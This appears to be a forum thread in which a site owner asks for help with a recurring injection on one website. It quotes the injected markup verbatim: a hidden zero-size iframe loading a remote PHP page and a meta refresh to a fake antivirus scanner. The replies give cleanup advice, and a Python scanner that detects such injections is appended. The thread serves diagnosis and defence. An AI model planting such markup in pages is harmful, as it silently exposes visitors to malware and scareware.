bla.php script added to website

100%Agave:
I have many websites hosted on our servers; so far only 1 website has had this script added to its web pages.  This has happened numerous times and only seems to affect this one site and so far has only been added to the index.htm page.

I have removed it every time but it reappears about once per month.

If anyone can shed some light on this and what would be my best course of action, I would appreciate it.

This is what I see in the webpage itself.

<!-- ~ --><iframe src="http://gtswiat.pl/grafika/gora2/ss/bla.php" width=0 height=0 border=0></iframe>

<meta http-equiv="Refresh" content="0; URL=http://www.avxp-2008.net/scanner/f4aed1aad924015ac4cc3d829e89a296/5/">

<!-- ~ -->

I did notice that the meta http-equiv with the scanner url is new this time.

Thanks for your assistance.

Kayrac:
http://hackademix.net/2008/04/26/mass-attack-faq/

Start with reading that.

#2 Update your apps, and remove offending code.

#3 After all apps are updated and you've read the above to familiarize yourself with what's going on, see if it continues after removal, then go from there :)

-Brian

PS: that fake antivirus meta tag is brand new, it'll probably continue to change constantly; that antivirus has basically 0 detection

http://www.virustotal.com/analisis/e46394a6e7ecdf1a50cbac801712334d

100%Agave:
I'm a little lost.  This particular website does not have a database.

What exactly am I looking for in the code and are we talking about actual code pages like .php, .asp, and .js?

Kayrac:
You're looking for that iframe thing. What's your website? I'll check it out tonight when I wake up and see if I can find any for you.

The other stuff I'm not sure about; the SQL injection isn't really my thing, I just kinda know what to remove to 'fix' the pages :P

100%Agave:
Thanks, I already removed the script and only found it on the index page.  I have been removing it about once a month for the last several months but it keeps coming back.  I am going to change the FTP access logins again for this site.

Since this site does not have a database, I am more concerned with how the script keeps getting put on that page.  I have already checked the permissions necessary to access that page and as far as I can see no one would be able to gain access except for the site owner or someone that guessed the site owner's login info.

I am searching now to see if the script is on any other pages but I spot checked and didn't find it.

If I can't get more info about this, I will send you the site so you can take a look at it.

Thanks,
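
The search for "that iframe thing" across every page of a site, as an added example that is not part of the original thread: a Python sketch that flags zero-size iframes and meta refreshes pointing at a host other than the site's own. The names `scan_html`, `scan_tree` and `own_hosts`, the file extensions, and the sample page with its placeholder hosts are assumptions made for illustration.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

class InjectionFinder(HTMLParser):
    # Collects hidden iframes and meta refreshes that point off-site.
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (line, kind, url)

    def _external(self, url):
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host not in self.own_hosts

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "iframe":
            hidden = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if hidden and self._external(a.get("src", "")):
                self.findings.append((self.getpos()[0], "hidden-iframe", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; URL=http://host/path"
            target = a.get("content", "").partition("=")[2].strip(" '\"")
            if self._external(target):
                self.findings.append((self.getpos()[0], "meta-refresh", target))

def scan_html(text, own_hosts=()):
    finder = InjectionFinder(own_hosts)
    finder.feed(text)
    return finder.findings

def scan_tree(root, own_hosts=(), exts=(".htm", ".html", ".php", ".asp")):
    hits = {}  # path -> findings, for every page with at least one hit
    for folder, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read(), own_hosts)
                if found:
                    hits[path] = found
    return hits

# Constructed sample page; the hosts are placeholders, not values from the thread.
SAMPLE = """<html><body><iframe src="/map.html" width=400 height=300></iframe>
<!-- ~ --><iframe src="http://injected.example/ss/bla.php" width=0 height=0 border=0></iframe>
<meta http-equiv="Refresh" content="0; URL=http://scanner.example/scan/5/">
<!-- ~ --></body></html>"""
```

Running `scan_tree` from a scheduled job and comparing its output between runs shows when a page was changed, which can then be matched against FTP and web server logs for that time.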
